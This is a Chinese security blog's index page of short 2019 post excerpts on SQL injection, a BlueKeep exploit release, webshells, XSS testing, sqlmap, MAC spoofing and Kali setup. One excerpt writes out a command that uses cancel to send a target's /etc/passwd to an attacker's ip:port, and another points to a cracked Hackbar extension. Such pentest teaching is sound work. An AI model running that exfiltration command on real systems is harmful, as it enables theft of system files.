CYH博客

2019-09-08 cener阅读(104)

0x012019年9月7日晚上凌晨1点左右，有老哥在github上发布了0708的漏洞利用程序。顿时群和朋友圈都爆炸了。于是就有了这篇文章。0x02首先是靶机，这里的靶机是使用清水表哥提供的win7s...

2019-04-30 hw阅读(383)

第一处sql注入：文件aj_js.php注入参数ad_idc6151212e5171ed249fa4ee5400b4534.png 只是对输入进行了去两边空格 并且直接拼接到sql语句中 而且是数字型...

2019-07-29 cener阅读(131)

起因：无聊 本地搭建的环境测试   木马如图： 抓包 发现后门地址 如图：Local我本机地址 p后面的是密码 访问地址 如图： 插入XSS...

2019-07-24 cener阅读(279)

在使用浏览器进行xss测试时需要预先关闭xss过滤器chrome的关闭方法：我的chrome安装目录在C:\Program Files (x86)\Google\Chrome\Application\...

2019-07-22 cener阅读(317)

sqlmap也是渗透中常用的一个注入工具，其实在注入工具方面，一个sqlmap就足够用了，只要你用的熟，秒杀各种工具，只是一个便捷性问题，sql注入另一方面就是手工党了，这个就另当别论了。今天把我一直...

2019-07-22 cener阅读(256)

SQL注入教程说明本教程旨在带领理解SQL注入基本原理与实现方式，以及常见的注入操作。学习SQL注入之前需要先学习基本的SQL语句，http基本的get与post请求，url编码。本教程从笔记中整理修...

2019-07-27 cener阅读(242)

靶机无回显的情况下，可使用 cancel  来把回显发送到攻击机端cancel -u "$(cat /etc/passwd)" -h ip:port攻

2019-07-23 cener阅读(292)

1.0. Hackbar破解版，来自土司老哥：5936https://chrome.google.com/webstore/detail/hackbarplus/cdgjblbpnplfacmoaba...

2019-07-18 cener阅读(307)

更改计算机的MAC地址，使用情形如下：防止某些软件记录你真实的MAC地址网络管理员屏蔽了你的MAC地址。。。。查看原始MAC地址：1# ifconfig我以无线网卡(wlan0)为例，00:17:c4...

2019-07-18 cener阅读(116)

Kali Linux默认下并没有自带vpn客户端，所以在网络设置里无法添加vpn。如果只想使用OpenVPN，使用如下命令安装：1# apt-get install network-manager-o...